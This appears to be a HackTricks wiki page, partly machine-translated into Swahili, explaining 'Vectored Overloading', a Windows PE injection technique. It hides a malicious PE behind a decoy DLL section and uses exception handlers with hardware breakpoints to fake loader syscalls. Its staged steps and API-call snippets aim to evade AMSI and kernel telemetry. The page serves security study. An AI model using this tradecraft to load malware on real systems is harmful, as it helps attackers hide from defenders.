Vectored Overloading PE Injection

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Muhtasari wa mbinu

Vectored Overloading ni primitive ya Windows PE injection ambayo inaunganisha classic Module Overloading na Vectored Exception Handlers (VEHs) pamoja na hardware breakpoints. Badala ya kufanyia patch LoadLibrary au kuandika loader yake mwenyewe, mwadui:

1. Anaunda section ya SEC_IMAGE iliyofungwa na DLL halali (mfano, wmp.dll).
2. Anaandika juu view iliyomapishwa na PE mbaya iliyopangwa kabisa lakini anaacha section object ikielekeza kwenye image isiyo hatari kwenye disk.
3. Anasajili VEH na kuprogram debug registers ili kila mwito wa NtOpenSection, NtMapViewOfSection, na hiari NtClose uamke breakpoint ya user-mode.
4. Anaita LoadLibrary("amsi.dll") (au DLL nyingine yoyote isiyo hatari). Wakati Windows loader inapoita syscalls hizo, VEH inaskip transition kwenye kernel na inarudisha handles na base addresses za image mbaya zilizotayarishwa.

Kwa kuwa loader bado inaamini kwamba ilichora DLL iliyotakiwa, zana zinazotazama tu faili za backing za section zinaona wmp.dll ingawa kumbukumbu sasa ina bytes za attacker. Wakati huo huo, imports/TLS callbacks bado zinatatuliwa na loader halisi, kupunguza kwa kiasi kikubwa kiasi cha mantiki ya custom ya kusoma PE ambayo mwadui anapaswa kudumisha.

Stage 1 – Build the disguised section

1. Create and map a section for the decoy DLL

NtCreateSection(&DecoySection, SECTION_ALL_ACCESS, NULL,
0, PAGE_READWRITE, SEC_IMAGE, L"\??\C:\\Windows\\System32\\wmp.dll");
NtMapViewOfSection(DecoySection, GetCurrentProcess(), &DecoyView, 0, 0,
NULL, &DecoySize, ViewShare, 0, PAGE_READWRITE);

2. Copy the malicious PE into that view section kwa section, ukizingatia SizeOfRawData/VirtualSize na kusasisha protections baadaye (PAGE_EXECUTE_READ, PAGE_READWRITE, n.k.).
3. Apply relocations and resolve imports hasa kama reflective loader ingefanya. Kwa kuwa view tayari imepangwa kama SEC_IMAGE, alignments za section na guard pages zinaendana na kile Windows loader inatarajia baadaye.
4. Normalize the PE header:

• Ikiwa payload ni EXE, weka IMAGE_FILE_HEADER.Characteristics |= IMAGE_FILE_DLL na futa entry point ili kuzuia LdrpCallTlsInitializers kuruka ndani ya stubs maalum za EXE.
• DLL payloads zinaweza kuacha headers zao bila kubadilishwa.

Wakati huu mchakato una view yenye uwezo wa RWX ambayo backing object bado ni wmp.dll, lakini bytes katika kumbukumbu zinadhibitiwa na mshambuliaji.

Stage 2 – Hijack the loader with VEHs

1. Register a VEH and arm hardware breakpoints: program Dr0 (au debug register nyingine) na address ya ntdll!NtOpenSection na set DR7 ili kila utekelezaji uamke STATUS_SINGLE_STEP. Rudia baadaye kwa NtMapViewOfSection na hiari NtClose.
2. Trigger DLL loading kwa LoadLibrary("amsi.dll"). LdrLoadDll hatimaye itaomba NtOpenSection kupata handle ya section halisi.
3. VEH hook for NtOpenSection:

• Tafuta slot ya stack kwa ajili ya argument ya [out] PHANDLE SectionHandle.
• Andika handle ya DecoySection iliyoundwa hapo awali kwenye slot hiyo.
• Piga mbele RIP/EIP hadi instruction ya ret ili kernel isiwe imeitwa kabisa.
• Re-arm hardware breakpoint kuangalia NtMapViewOfSection ifuatayo.

4. VEH hook for NtMapViewOfSection:

• Andika juu [out] PVOID *BaseAddress (na outputs za size/protection) na address ya view mbaya ambayo tayari imepangwa.
• Ruka sehemu ya syscall kama ilivyofanywa hapo awali.

5. (Optional) VEH hook for NtClose inathibitisha kuwa fake section handle imesafishwa, kuzuia resource leaks na kutoa ukaguzi wa mwisho wa busara.

Kwa kuwa syscalls hazitekelezeki kabisa, kernel callbacks (ETWti, minifilter, n.k.) haziona matukio ya kushtukiza ya NtOpenSection/NtMapViewOfSection, hivyo kupunguza telemetry kwa kiasi kikubwa. Kutoka kwa mtazamo wa loader kila kitu kilifanikiwa na amsi.dll iko katika memory, hivyo inaendelea na utekelezaji wa import/TLS dhidi ya bytes za mshambuliaji.

Stage 3 – Endesha payload

• EXE payload: Injector inaruka tu hadi original entry point mara relocations zitakapokamilika. Wakati loader inadhani itaitisha DllMain, code maalum badala yake inafanya entry ya mtindo wa EXE.
• DLL payload / Node.js addon: Tambua na itishe export iliyokusudiwa (Kidkadi inaonyesha function yenye jina kwa JavaScript). Kwa kuwa module tayari imejisajili kwa LdrpModuleBaseAddressIndex, utafutaji unaofuata unaiona kama DLL isiyo hatari.

Wakati imeunganishwa na Node.js native addon (.node file), kazi nzito za Windows-internals zinabaki nje ya layer ya JavaScript, zikimsaidia threat actor kupeleka loader ile ile kwa wrappers tofauti nyingi za Node zilizofichwa.

Marejeo

• Check Point Research – GachiLoader: Defeating Node.js Malware with API Tracing
• VectoredOverloading – PoC implementation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.